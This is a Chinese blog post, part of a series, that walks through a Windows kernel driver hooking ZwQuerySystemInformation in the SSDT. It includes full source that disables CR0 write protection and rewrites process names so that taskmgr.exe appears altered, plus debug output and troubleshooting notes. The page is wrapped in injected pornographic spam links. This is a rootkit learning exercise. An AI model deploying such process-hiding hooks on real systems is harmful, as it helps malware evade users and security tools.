青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

S.l.e!ep.¢%

像打了激速一樣,以四倍的速度運轉,開心的工作
簡單、開放、平等的公司文化;尊重個性、自由與個人價值;
posts - 1098, comments - 335, trackbacks - 0, articles - 1
  C++博客 :: 首頁 :: 新隨筆 :: 聯系 :: 聚合  :: 管理

HOOK SSDT Hide Process (六)

Posted on 2009-10-26 19:10 S.l.e!ep.¢% 閱讀(352) 評論(0)  編輯 收藏 引用 所屬分類: RootKit
[資料] http://www.shnenglu.com/sleepwom/archive/2009/10/24/99375.html

HOOK SSDT Hide Process (五)?? R3 已經知道 ZwQuerySystemInformation 函數用來 enum 進程
那么現在看下 R0 的HOOK 函數實現先

從致是調用回 ntdll.dll? 中的 ZwQuerySystemInformation 函數,取得返回值后,再把相關的數據過濾掉
編譯后運行有問題,于是乎對程序作了一下修改,主要改了 MyZwQuerySystemInformation 函數
在判斷到進程的名字是 taskmgr.exe 就把它改為 haha

#include?"ssdthook.h"

#pragma??pack(1)

typedef?struct?_SSDT_TABLE
{
??PVOID???ServiceTableBase;
??PULONG??ServiceCounterTableBase;
??ULONG???NumberOfService;
??ULONG???ParamTableBase;
}SSDT_TABLE,*?PSSDT_TABLE;
#pragma?pack()

struct?_SYSTEM_THREADS
{
??LARGE_INTEGER???????????KernelTime;
??LARGE_INTEGER???????????UserTime;
??LARGE_INTEGER???????????CreateTime;
??ULONG???????????????????????????WaitTime;
??PVOID???????????????????????????StartAddress;
??CLIENT_ID???????????????????????ClientIs;
??KPRIORITY???????????????????????Priority;
??KPRIORITY???????????????????????BasePriority;
??ULONG???????????????????????????ContextSwitchCount;
??ULONG???????????????????????????ThreadState;
??KWAIT_REASON????????????WaitReason;
};


//===================================================
struct?_SYSTEM_PROCESSES
{
??ULONG???????????????????????????NextEntryDelta;
??ULONG???????????????????????????ThreadCount;
??ULONG???????????????????????????Reserved[6];
??LARGE_INTEGER???????????CreateTime;
??LARGE_INTEGER???????????UserTime;
??LARGE_INTEGER???????????KernelTime;
??UNICODE_STRING??????????ProcessName;
??KPRIORITY???????????????????????BasePriority;
??ULONG???????????????????????????ProcessId;
??ULONG???????????????????????????InheritedFromProcessId;
??ULONG???????????????????????????HandleCount;
??ULONG???????????????????????????Reserved2[2];
??VM_COUNTERS?????????????????????VmCounters;
??IO_COUNTERS?????????????????????IoCounters;?//windows?2000?only
??struct?_SYSTEM_THREADS??????????Threads[1];
};

struct?_SYSTEM_PROCESSOR_TIMES
{
???LARGE_INTEGER??????????IdleTime;
???LARGE_INTEGER??????????KernelTime;
???LARGE_INTEGER??????????UserTime;
???LARGE_INTEGER??????????DpcTime;
???LARGE_INTEGER??????????InterruptTime;
???ULONG??????????????InterruptCount;
};

//======================================================
typedef?NTSTATUS?(__stdcall?*ZWQUERYSYSTEMINFORMATION)(
???IN?ULONG?SystemInformationClass,?
???IN?PVOID?SystemInformation,?
???IN?ULONG?SystemInformationLength,?
???OUT?PULONG?ReturnLength);

NTSTATUS?MyZwQuerySystemInformation(?
???IN?ULONG?SystemInformationClass,?
???IN?PVOID?SystemInformation,?
???IN?ULONG?SystemInformationLength,?
???OUT?PULONG?ReturnLength);

//定義全局變量
extern?"C"?extern?PSSDT_TABLE??KeServiceDescriptorTable;
ULONG??OldAddress;
ZWQUERYSYSTEMINFORMATION????????OldZwQuerySystemInformation;
PVOID?Base;

void?UnHook();

VOID?Unload?(IN?PDRIVER_OBJECT?pDriverObject)?
{
????????KdPrint(("Enter?DriverUnload\n"));
????????UnHook();???//?mark

}

NTSTATUS?MyZwQuerySystemInformation(IN?ULONG?SystemInformationClass,?
????????????????????????????????????IN?PVOID?SystemInformation,?
????????????????????????????????????IN?ULONG?SystemInformationLength,?
????????????????????????????????????OUT?PULONG?ReturnLength)?//定義自己的Hook函數
{?
????
????NTSTATUS?rc;?
????UNICODE_STRING?process_name;
????
????RtlInitUnicodeString(&process_name,?L"taskmgr.exe");
????
????rc?=?(OldZwQuerySystemInformation)?(?
????????SystemInformationClass,?
????????SystemInformation,?
????????SystemInformationLength,?
????????ReturnLength);?
????
????if(NT_SUCCESS(rc))?
????{
????????if(5?==?SystemInformationClass)
????????{?
????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;?
????????????
????????????while(curr)
????????????{
????????????????if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????{
????????????????????????????????????????DbgPrint("before?%wZ\n",&process_name);?
????????????????????????????????????????RtlInitUnicodeString(&(curr->ProcessName),?L"haha");??????????????????????????????????????????
????????????????????????????????????????DbgPrint("after?%wZ\n",&(curr->ProcessName));?


????????????????}?//?if?(RtlEqualUnicodeString(&process_name,?&curr->ProcessName,?1))
????????????????

????????????????if(curr->NextEntryDelta)
????????????????????curr?=?(_SYSTEM_PROCESSES?*)((ULONG)curr?+?curr->NextEntryDelta);?
????????????????else?
????????????????????curr?=?NULL;

????????????}?//while(curr)
????????????
????????}?//?if(5?==?SystemInformationClass)
????????
????}//?if(NT_SUCCESS(rc))
????
????//?KdPrint(("HookZwQuerySystemInformation?is?Succeessfully.?\n"));
????return?rc;
}

VOID?Hook()

{

????????DbgPrint("Entry?Hook()\n");
????????OldAddress?=(ULONG)KeServiceDescriptorTable->ServiceTableBase?+?4*0xAd;//用windbg反匯編查到zwquerysysteminformationde的ID號是0xADh
????????DbgPrint("KeServiceDescriptorTable->ServiceTableBase?is?:0x%0x\n",KeServiceDescriptorTable->ServiceTableBase);
????????//保存原來函數的地址
????????OldZwQuerySystemInformation?=?(ZWQUERYSYSTEMINFORMATION)?*(ULONG?*)OldAddress;
????????DbgPrint("OldZwQuerySystemInformation?is?:0x%0x\n",?OldZwQuerySystemInformation);
????????DbgPrint("MyZwQuerySystemInformation?is?:0x%0x\n",?MyZwQuerySystemInformation);
????????
????????//取消內存寫保護
????????_asm
????????{?
????????cli
????????mov??eax,cr0
????????and??eax,not?10000h
????????mov??cr0,eax
????????}

????????*(ULONG*)OldAddress?=(ULONG)?MyZwQuerySystemInformation;???????//mark???MyZwQuerySystemInformation;
????????
????????//還原內存寫保護
????????_asm
????????{
????????mov??eax,cr0
????????or???eax,10000h
????????mov??cr0,eax?
????????sti
????????}
}

void?UnHook()
{
??ULONG??Address;

??Address?=(ULONG)?KeServiceDescriptorTable->ServiceTableBase?+0xAD*4;

??__asm
??{
????cli
????mov??eax,cr0
????and??eax,not?10000h
????mov??cr0,eax
??}

??*(ULONG*)Address?=(ULONG)?OldZwQuerySystemInformation;

??__asm
??{??
????mov??eax,cr0
????or???eax,10000h
????mov??cr0,eax
????sti
??}

??DbgPrint("Unhook?leave!\n");
}

//========================驅動入口函數
extern?"C"?NTSTATUS?DriverEntry(IN?PDRIVER_OBJECT??pDriverObject,?IN?PUNICODE_STRING??pRegistryPath)
{

??DbgPrint("Entry?Hook?Function!\n");
??pDriverObject->DriverUnload?=?Unload;
??Hook();
??DbgPrint("Leave?DriverEntry!\n");
??return?STATUS_SUCCESS;
}?

運行后, 事與愿違, 并沒有顯示 haha, 而是顯示為空
用 DebugView 顯示調試信息

Entry?Hook?Function!
Entry?Hook()
KeServiceDescriptorTable->ServiceTableBase?is?:0x804e2d20
OldZwQuerySystemInformation?is?:0x8057cc27
MyZwQuerySystemInformation?is?:0xf8ed4080
Leave?DriverEntry!
before?taskmgr.exe
after?haha

Q:為何在 taskmgr.exe 中會顯示為空?疑問中
采用 HOOK SSDT Hide Process (五)??中的程序跟蹤發現,taskmgr.exe 的 imagename.buffer 的地址居然是 0xb049480
這個地址顯然不是應用層的地址,后果然后是不讓訪問了

于是改成用 memcpy

DbgPrint("before 0x%X %d %wZ\n", &(curr->ProcessName), curr->ProcessName.Length, &(curr->ProcessName));
//RtlInitUnicodeString(&(curr->ProcessName), L"fdsf");
memcpy(curr->ProcessName.Buffer, L"_root_", 12);
DbgPrint("after 0x%X %d %wZ\n", &(curr->ProcessName), curr->ProcessName.Length, &(curr->ProcessName));

結果,運行成功
taskmgr.exe 的 imagename 被成功修改為 _root_r.exe

產生新的問題:
Q:? RtlInitUnicodeString 對 UNICODE_STRING 賦值是會同時分配緩沖區的空間?這一點查了MSDN,沒看到有相關的說明
需要找時間去驗證下
A:? RtlInitUnicodeString() 這個函數它并不是直接去修改內存,而是重新分配一段緩沖區,而這段緩沖區在離開函數后就無效了
??????而用戶傳進來的?SystemInformation 指針,是一段連續的內存空間

Q:???用戶區傳進來的 SystemInformation 指針,是一段連續的內存空間,也就是說, 如果修改了 IMAGENAME 的內容,導致
原來 UNICODE_STRING.buffer 不足的話,那么需要把后面的 SystemInformation 都往后移?(這一點也需要找時間驗證下)
比較保險的做法是,先執行系統的 ZwQuerySytemInformation 后,先把所有的 SystemInformation 都讀出來,然后再分別寫到
用戶傳進來的 SystemInformation? 緩沖區。
A: 這個嘗試過,不過藍屏,需要找時間再仔細研究下
青青草原综合久久大伊人导航_色综合久久天天综合_日日噜噜夜夜狠狠久久丁香五月_热久久这里只有精品

    • <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            
亚洲在线视频一区|
亚洲美女视频在线免费观看|
欧美精品久久天天躁|
欧美亚洲一区二区三区|
欧美高清自拍一区|
久久综合五月天婷婷伊人|
国产精品成人一区|
亚洲三级网站|
亚洲日韩欧美视频一区|
久久综合久久综合久久|
久久久久久久91|
国产精品婷婷|
亚洲天堂偷拍|
亚洲午夜久久久久久久久电影院|
毛片一区二区三区|
久久综合福利|
在线观看不卡av|
欧美制服丝袜|
久久精品国内一区二区三区|
国产精品久久久久久av福利软件
|
欧美a级片网站|
国产无一区二区|
香蕉乱码成人久久天堂爱免费|
这里只有精品电影|
欧美日韩a区|
亚洲激情一区二区|
亚洲乱码国产乱码精品精|
久久在线播放|
欧美国产视频一区二区|
亚洲国产精品久久|
免播放器亚洲一区|
亚洲国产合集|
一本不卡影院|
欧美视频在线观看一区二区|
99视频精品在线|
午夜精品亚洲|
国产香蕉97碰碰久久人人|
欧美一区二区三区免费大片|
久久综合国产精品台湾中文娱乐网|
国产一区二区三区四区五区美女|
欧美一区三区三区高中清蜜桃|
久久精品30|
亚洲成人在线网|
欧美国产一区二区|
一区二区三区高清在线|
亚洲夜间福利|
国产在线精品一区二区夜色|
久久久久久久999精品视频|
欧美国产日韩一区|
一区二区三区四区精品|
国产精品久久久久久久第一福利|
亚洲欧美日韩精品久久久|
久久久激情视频|
亚洲日韩第九十九页|
国产精品a久久久久久|
欧美一区二区三区在|
欧美成人在线影院|
亚洲午夜在线观看视频在线|
国产麻豆午夜三级精品|
久久综合影视|
在线视频你懂得一区|
久久久99精品免费观看不卡|
最新亚洲一区|
国产手机视频一区二区|
欧美国产免费|
亚洲男人的天堂在线aⅴ视频|
免费久久99精品国产|
亚洲一区二区网站|
亚洲大胆视频|
国产欧美一区二区视频|
欧美—级a级欧美特级ar全黄|
亚洲欧美中日韩|
亚洲精品日本|
美女久久网站|
小嫩嫩精品导航|
亚洲精品久久久久久久久|
国产一区二区三区黄视频|
欧美激情一区在线观看|
久久aⅴ国产欧美74aaa|
99在线|亚洲一区二区|
欧美www视频|
久久精品一区中文字幕|
亚洲一区二区三区色|
亚洲国产精品精华液网站|
国产欧美一区二区视频|
欧美色综合网|
欧美二区在线|
久久躁狠狠躁夜夜爽|
欧美一区二区大片|
一区二区电影免费在线观看|
亚洲第一在线综合网站|
久久综合成人精品亚洲另类欧美|
亚洲欧美日韩综合aⅴ视频|
aa亚洲婷婷|
亚洲精品一区二区三|
在线观看视频免费一区二区三区|
国产欧美一区二区三区沐欲|
国产精品视频免费一区|
国产精品二区在线|
欧美日韩在线观看一区二区三区|
欧美~级网站不卡|
老司机凹凸av亚洲导航|
久久精品国产久精国产思思|
欧美一区在线看|
欧美一二三区在线观看|
亚洲一区久久久|
亚洲一区二区三区在线视频|
亚洲午夜一区|
亚洲欧美在线免费观看|
性色一区二区|
欧美一区二区三区免费观看|
欧美一区二区三区免费大片|
午夜在线观看免费一区|
性色av一区二区三区在线观看|
亚洲免费中文字幕|
欧美一进一出视频|
久久精品夜色噜噜亚洲a∨|
久久久久久亚洲精品中文字幕|
欧美综合国产|
嫩草国产精品入口|
欧美日韩国产小视频|
国产精品videosex极品|
国产精品视频免费在线观看|
国内激情久久|
亚洲成色www久久网站|
亚洲国产精品久久久久婷婷884
|
99re这里只有精品6|
99精品久久|
午夜精品999|
久久只有精品|
亚洲精品网站在线播放gif|
夜夜嗨av一区二区三区四季av|
亚洲午夜精品网|
久久久99久久精品女同性|
免费久久99精品国产自在现线|
欧美激情一区在线|
国产精品美女久久久浪潮软件
|
国产精品福利在线|
国产日韩1区|
亚洲日本在线观看|
亚洲欧美网站|
欧美福利电影网|
中文亚洲欧美|
蜜桃av一区二区|
国产精品看片资源|
亚洲国产精品一区二区第一页|
一区二区三区视频免费在线观看|
久久激情一区|
亚洲日本中文|
久久九九99视频|
欧美日韩一区二区在线|
好吊色欧美一区二区三区视频|
亚洲美女少妇无套啪啪呻吟|
亚洲欧美日韩一区二区三区在线观看
|
美日韩精品免费|
国产精品进线69影院|
在线观看91精品国产入口|
亚洲少妇一区|
欧美a级在线|
亚洲你懂的在线视频|
欧美国产视频在线观看|
国语自产精品视频在线看|
一区二区三区欧美日韩|
久久夜色精品国产亚洲aⅴ
|
亚洲欧美日韩直播|
欧美另类人妖|
亚洲成人资源网|
久久国产主播|
亚洲视频专区在线|
欧美日韩国产欧美日美国产精品|
激情另类综合|
久久爱www久久做|
aⅴ色国产欧美|
欧美激情一级片一区二区|
黄色一区二区在线|
欧美在线免费观看视频|
夜夜嗨av一区二区三区免费区|
女主播福利一区|
在线观看不卡|
久久综合网hezyo|
欧美一区二区精品在线|
国产精品一区免费观看|
亚洲一区精品视频|
日韩午夜三级在线|
欧美日韩国产一中文字不卡|
亚洲国产精品久久精品怡红院|
久久婷婷久久|
欧美一区影院|
红桃视频国产一区|
久久久爽爽爽美女图片|
午夜在线不卡|
韩国v欧美v日本v亚洲v|
久久国产精品网站|
亚洲欧美怡红院|
国产欧美精品xxxx另类|
欧美在线啊v|
欧美一区二区三区视频在线|
国产精品一香蕉国产线看观看
|
久久久久久亚洲精品杨幂换脸|
亚洲在线观看免费视频|